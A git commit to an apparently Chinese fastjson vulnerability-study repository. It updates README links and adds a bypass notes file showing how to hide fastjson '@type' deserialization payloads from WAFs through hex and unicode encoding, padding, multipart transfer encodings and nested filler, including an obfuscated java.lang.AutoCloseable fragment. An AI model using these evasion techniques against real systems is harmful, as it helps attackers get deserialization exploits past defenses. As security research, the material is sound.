sync

Author: Whoopsunix

README.md

@@ -6,18 +6,21 @@ fastjson复现简单、调用链多，很多时候反而更像是在看其他组
 
 所以起了个项目记录自己复现过的POC，顺便记录pom依赖，毕竟找环境还是挺麻烦的
 
-后续poc 环境 分析文章在 github 同步
+后续poc 环境 分析文章在 github 同步  
 https://github.com/Whoopsunix/fastjson_study
 
-# 环境见
-https://github.com/Whoopsunix/PPPVULNS
+# 环境
+[环境](https://github.com/Whoopsunix/PPPVULNS/tree/master/fastjsonDemo)
 
 # json框架区分、dnslog、版本探测、利用链探测
 [fastjson check](fastjsonCheck/fastjsonCheck.md)
 
 # 全版本poc合集
 [1.2.24-1.2.80 poc](recurring.md)
 
+# bypass
+[bypass](bypass/bypass.md)
+
 # 感谢以下师傅的研究
 +  https://github.com/LeadroyaL/fastjson-blacklist fastjson黑白名单
 +  https://github.com/safe6Sec/Fastjson  目前最全的poc合集
@@ -26,4 +29,4 @@ https://github.com/Whoopsunix/PPPVULNS
 +  https://mp.weixin.qq.com/s/5mO1L5o8j_m6RYM6nO-pAA  版本区分
 +  https://b1ue.cn/archives/506.html 浅蓝博客
 +  https://github.com/knownsec/KCon/tree/master/2022 浅蓝kcon分享
-+  https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/ 雨了个雨 低版本 bcel
++  https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/ 雨了个雨 低版本 bcel

bypass/bypass.md

@@ -0,0 +1,65 @@
+```java
+JSON.parse("{\"@type\":\"org.example.User\",\"username\":\"1\"}")
+
+&User {
+	username: 1
+}
+```
+
+# WAF bypass
+demo
+```json
+{
+	"@type":"org.example.User",
+	"username":"1"
+}
+```
+
+# 编码绕过
+fastjson 对 key,value 值会自动进行 hex 解码和 unicode解码
+hex
+```json
+{
+	"\x40\x74\x79\x70\x65":"\x6f\x72\x67\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x55\x73\x65\x72",
+	"username":"1"
+}
+```
+
+unicode
+```json
+{
+	"@type":"\u006f\u0072\u0067\u002e\u0065\u0078\u0061\u006d\u0070\u006c\u0065\u002e\u0055\u0073\u0065\u0072",
+	"username":"1"
+}
+```
+
+# 字符填充
+```json
+{
+	"@type":"org.example.User",
+	"username":"1",
+	"f":"a*20000"
+}
+```
+
+二次反序列化
+
+$ref
+http://www.bmth666.cn/bmth_blog/2022/04/11/Fastjson%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/#%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0
+
+编码
+https://blog.csdn.net/fmyyy1/article/details/121674546
+
+绕过 WAF ，在部分中间件中，multipart 支持指定 Content-Transformer-Encoding 可以使用 Base64 或 quoted-printable （QP 编码） 来绕过 WAF
+
+大量字符绕过 WAF
+```
+[11111111111111111111111111111111111,[11111111111111111111111111111111111... ,[11111111111111111111111111111111111... ,[11111111111111111111111111111111111... ,[11111111111111111111111111111111111... ,...,{'\x40\u0074\x79\u0070\x65':xjava.lang.AutoCloseable"... ]]]]]
+
+```
+
+各种特性
+```
+,new:[NaN,x'00',{,/*}*/'\x40\u0074\x79\u0070\x65':xjava.lang.AutoClosea ble"
+```
+